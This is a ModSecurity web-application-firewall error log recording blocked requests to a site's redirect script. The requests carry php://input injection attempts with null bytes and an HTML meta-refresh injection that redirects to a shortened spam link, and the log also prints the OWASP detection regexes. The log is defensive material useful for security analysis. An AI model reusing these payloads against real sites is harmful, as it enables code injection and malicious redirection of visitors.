[Tue May 12 05:36:50.953845 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 18)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUtr1yOh9TvizezihkQAAAFY"]
[Tue May 12 05:36:50.954114 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): XSS Filter - Category 3: Attribute Vector"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgUtr1yOh9TvizezihkQAAAFY"]
[Tue May 12 05:36:53.247562 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgVdr1yOh9TvizezihmgAAAFY"]
[Tue May 12 05:36:53.247620 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgVdr1yOh9TvizezihmgAAAFY"]
[Tue May 12 05:36:53.248384 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 8)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgVdr1yOh9TvizezihmgAAAFY"]
[Tue May 12 05:36:53.248623 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgVdr1yOh9TvizezihmgAAAFY"]
[Tue May 12 05:36:55.820867 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgV9r1yOh9TvizezihpQAAAFY"]
[Tue May 12 05:36:55.820949 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgV9r1yOh9TvizezihpQAAAFY"]
[Tue May 12 05:36:55.821691 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 8)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgV9r1yOh9TvizezihpQAAAFY"]
[Tue May 12 05:36:55.821945 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgV9r1yOh9TvizezihpQAAAFY"]
[Tue May 12 05:36:56.059563 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://input found within ARGS:url: php://input"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgWNr1yOh9TvizezihpgAAAFY"]
[Tue May 12 05:36:56.060100 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgWNr1yOh9TvizezihpgAAAFY"]
[Tue May 12 05:36:56.060357 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: I/O Stream Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgWNr1yOh9TvizezihpgAAAFY"]
[Tue May 12 05:36:56.297462 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgWNr1yOh9TvizezihpwAAAFY"]
[Tue May 12 05:36:56.297515 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Found 1 byte(s) in ARGS:url outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgWNr1yOh9TvizezihpwAAAFY"]
[Tue May 12 05:36:56.297813 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "96"] [id "933140"] [msg "PHP Injection Attack: I/O Stream Found"] [data "Matched Data: php://input found within ARGS:url: php://input\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgWNr1yOh9TvizezihpwAAAFY"]
[Tue May 12 05:36:56.298284 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 13)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgWNr1yOh9TvizezihpwAAAFY"]
[Tue May 12 05:36:56.298495 2026] [security2:error] [pid 1825179:tid 1825220] [client 104.238.148.72:60024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: I/O Stream Found"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKgWNr1yOh9TvizezihpwAAAFY"]
[Tue May 12 05:38:56.080271 2026] [security2:error] [pid 1825287:tid 1825327] [client 194.233.64.127:64725] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https:/olv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://cleanuri.com/nmbbv1>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://cleanuri.com/nmbbv1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKg0AgpmE1yW0glLdgwgwAAANU"]
[Tue May 12 05:38:56.080677 2026] [security2:error] [pid 1825287:tid 1825327] [client 194.233.64.127:64725] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Cleanuri.com/nmBBV1>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 /> found within ARGS:url: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Cleanuri.com/nmBBV1>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKg0AgpmE1yW0glLdgwgwAAANU"]
[Tue May 12 05:38:56.081029 2026] [security2:error] [pid 1825287:tid 1825327] [client 194.233.64.127:64725] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 /> found within ARGS:url: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Cleanuri.com/nmBBV1>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-24 [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKg0AgpmE1yW0glLdgwgwAAANU"]
[Tue May 12 05:38:56.081488 2026] [security2:error] [pid 1825287:tid 1825327] [client 194.233.64.127:64725] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Cleanuri.com/nmBBV1>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWAS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKg0AgpmE1yW0glLdgwgwAAANU"]
[Tue May 12 05:38:56.081993 2026] [security2:error] [pid 1825287:tid 1825327] [client 194.233.64.127:64725] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Cleanuri.com/nmBBV1>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKg0AgpmE1yW0glLdgwgwAAANU"]
[Tue May 12 05:38:56.082366 2026] [security2:error] [pid 1825287:tid 1825327] [client 194.233.64.127:64725] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKg0AgpmE1yW0glLdgwgwAAANU"]
[Tue May 12 05:38:56.082718 2026] [security2:error] [pid 1825287:tid 1825327] [client 194.233.64.127:64725] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKg0AgpmE1yW0glLdgwgwAAANU"]
[Tue May 12 05:38:56.716815 2026] [security2:error] [pid 1825179:tid 1825213] [client 194.233.64.127:64738] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https:/olv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://cleanuri.com/nmbbv1>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://cleanuri.com/nmbbv1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKg0Nr1yOh9TvizeziiDQAAAE8"]
[Tue May 12 05:38:56.717219 2026] [security2:error] [pid 1825179:tid 1825213] [client 194.233.64.127:64738] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Cleanuri.com/nmBBV1>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 /> found within ARGS:url: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Cleanuri.com/nmBBV1>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKg0Nr1yOh9TvizeziiDQAAAE8"]
[Tue May 12 05:38:56.717372 2026] [security2:error] [pid 1825179:tid 1825213] [client 194.233.64.127:64738] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 /> found within ARGS:url: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Cleanuri.com/nmBBV1>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-24 [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKg0Nr1yOh9TvizeziiDQAAAE8"]
[Tue May 12 05:38:56.717829 2026] [security2:error] [pid 1825179:tid 1825213] [client 194.233.64.127:64738] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Cleanuri.com/nmBBV1>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWAS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKg0Nr1yOh9TvizeziiDQAAAE8"]
[Tue May 12 05:38:56.718106 2026] [security2:error] [pid 1825179:tid 1825213] [client 194.233.64.127:64738] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Cleanuri.com/nmBBV1>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://Cleanuri.com/nmBBV1 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKg0Nr1yOh9TvizeziiDQAAAE8"]
[Tue May 12 05:38:56.718480 2026] [security2:error] [pid 1825179:tid 1825213] [client 194.233.64.127:64738] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKg0Nr1yOh9TvizeziiDQAAAE8"]
